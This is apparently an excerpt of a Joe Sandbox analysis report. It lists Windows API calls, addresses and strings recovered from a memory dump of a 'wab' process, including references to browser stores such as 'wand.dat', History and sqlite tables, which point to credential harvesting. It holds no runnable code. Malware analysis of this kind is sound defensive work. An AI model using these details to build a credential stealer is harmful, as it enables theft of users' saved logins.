                                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                • memset.MSVCRT ref: 0040C4D0
                                                • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                • String ID:
                                                • API String ID: 1973883786-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • memset.MSVCRT ref: 004116FF
                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                  • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                  • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                • API String ID: 2618321458-3614832568
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • memset.MSVCRT ref: 004185FC
                                                • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                                                • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??3@AttributesFilememset
                                                • String ID:
                                                • API String ID: 776155459-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                • malloc.MSVCRT ref: 00417524
                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                                                • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                                                • String ID:
                                                • API String ID: 2308052813-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: PathTemp$??3@
                                                • String ID: %s\etilqs_$etilqs_
                                                • API String ID: 1589464350-1420421710
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • memset.MSVCRT ref: 0040FDD5
                                                  • Part of subcall function 00414E7F: memcpy.MSVCRT ref: 00414EFC
                                                  • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                  • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                • _snwprintf.MSVCRT ref: 0040FE1F
                                                Strings
                                                Similarity
                                                • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                • String ID: <%s>%s</%s>$</item>$<item>
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • wcscpy.MSVCRT ref: 0041477F
                                                • wcscpy.MSVCRT ref: 0041479A
                                                • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
                                                • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                Strings
                                                Similarity
                                                • API ID: wcscpy$CloseCreateFileHandle
                                                • String ID: General
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Similarity
                                                • API ID: ErrorLastMessage_snwprintf
                                                • String ID: Error$Error %d: %s
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Similarity
                                                • API ID:
                                                • String ID: foreign key constraint failed$new$oid$old
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                Similarity
                                                • API ID: memcpy
                                                • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Similarity
                                                • API ID: memcpymemset
                                                • String ID: gj
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                                                  • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                Similarity
                                                • API ID: ??3@
                                                • String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • AreFileApisANSI.KERNEL32 ref: 00417497
                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                • malloc.MSVCRT ref: 004174BD
                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                                                Similarity
                                                • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                                                • String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetParent.USER32(?), ref: 0040D453
                                                • GetWindowRect.USER32(?,?), ref: 0040D460
                                                • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                Similarity
                                                • API ID: Window$Rect$ClientParentPoints
                                                • String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                • memset.MSVCRT ref: 004450CD
                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                  • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                  • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                                                  • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                                                  • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                                                • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                Similarity
                                                • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                • String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • wcscpy.MSVCRT ref: 0044475F
                                                • wcscat.MSVCRT ref: 0044476E
                                                • wcscat.MSVCRT ref: 0044477F
                                                • wcscat.MSVCRT ref: 0044478E
                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                  • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                                  • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                Strings
                                                Similarity
                                                • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                • String ID: \StringFileInfo\
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Similarity
                                                • API ID: ??3@
                                                • String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Similarity
                                                • API ID: memcpy$??3@
                                                • String ID: g4@
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Similarity
                                                • API ID: _memicmpwcslen
                                                • String ID: @@@@$History
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • memset.MSVCRT ref: 004100FB
                                                • memset.MSVCRT ref: 00410112
                                                  • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                  • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                • _snwprintf.MSVCRT ref: 00410141
                                                Strings
                                                Similarity
                                                • API ID: memset$_snwprintf_wcslwrwcscpy
                                                • String ID: </%s>
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • memset.MSVCRT ref: 0040D58D
                                                • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                Strings
                                                Similarity
                                                • API ID: ChildEnumTextWindowWindowsmemset
                                                • String ID: caption
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                  • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                Strings
                                                Similarity
                                                • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                • String ID: MS Sans Serif
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ClassName_wcsicmpmemset
                                                • String ID: edit
                                                • API String ID: 2747424523-2167791130
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                • String ID: SHAutoComplete$shlwapi.dll
                                                • API String ID: 3150196962-1506664499
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memcpy$memcmp
                                                • String ID:
                                                • API String ID: 3384217055-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memset$memcpy
                                                • String ID:
                                                • API String ID: 368790112-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                  • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                  • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                  • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                  • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                • GetMenu.USER32(?), ref: 00410F8D
                                                • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                • String ID:
                                                • API String ID: 1889144086-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                • GetLastError.KERNEL32 ref: 0041810A
                                                • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: File$CloseCreateErrorHandleLastMappingView
                                                • String ID:
                                                • API String ID: 1661045500-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                • memcpy.MSVCRT ref: 0042EC7A
                                                Strings
                                                • sqlite_altertab_%s, xrefs: 0042EC4C
                                                • virtual tables may not be altered, xrefs: 0042EBD2
                                                • Cannot add a column to a view, xrefs: 0042EBE8
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memcpymemset
                                                • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                • API String ID: 1297977491-2063813899
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • memset.MSVCRT ref: 0040560C
                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                  • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                  • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                • String ID: *.*$dat$wand.dat
                                                • API String ID: 2618321458-1828844352
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                • wcslen.MSVCRT ref: 00410C74
                                                • _wtoi.MSVCRT ref: 00410C80
                                                • _wcsicmp.MSVCRT ref: 00410CCE
                                                • _wcsicmp.MSVCRT ref: 00410CDF
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                • String ID:
                                                • API String ID: 1549203181-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • memset.MSVCRT ref: 00412057
                                                  • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                • GetKeyState.USER32(00000010), ref: 0041210D
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                • String ID:
                                                • API String ID: 3550944819-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • wcslen.MSVCRT ref: 0040A8E2
                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                  • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                  • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                • memcpy.MSVCRT ref: 0040A94F
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??3@$memcpy$mallocwcslen
                                                • String ID:
                                                • API String ID: 3023356884-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • wcslen.MSVCRT ref: 0040B1DE
                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                  • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                  • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                                                • memcpy.MSVCRT ref: 0040B248
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??3@$memcpy$mallocwcslen
                                                • String ID:
                                                • API String ID: 3023356884-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memcpy
                                                • String ID: @
                                                • API String ID: 3510742995-2766056989
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??2@??3@memcpymemset
                                                • String ID:
                                                • API String ID: 1865533344-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • strlen.MSVCRT ref: 0040B0D8
                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                  • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                  • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                                                • memcpy.MSVCRT ref: 0040B159
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??3@$memcpy$mallocstrlen
                                                • String ID:
                                                • API String ID: 1171893557-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • memset.MSVCRT ref: 004144E7
                                                  • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                  • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                • memset.MSVCRT ref: 0041451A
                                                • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                • String ID:
                                                • API String ID: 1127616056-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memcpy$memset
                                                • String ID: sqlite_master
                                                • API String ID: 438689982-3163232059
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                • wcscpy.MSVCRT ref: 00414DF3
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: BrowseFolderFromListMallocPathwcscpy
                                                • String ID:
                                                • API String ID: 3917621476-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                  • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                • _snwprintf.MSVCRT ref: 00410FE1
                                                • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                • _snwprintf.MSVCRT ref: 0041100C
                                                • wcscat.MSVCRT ref: 0041101F
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                • String ID:
                                                • API String ID: 822687973-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                                                • malloc.MSVCRT ref: 00417459
                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7591DF80,?,0041755F,?), ref: 00417478
                                                • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide$??3@malloc
                                                • String ID:
                                                • API String ID: 4284152360-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                • RegisterClassW.USER32(?), ref: 00412428
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
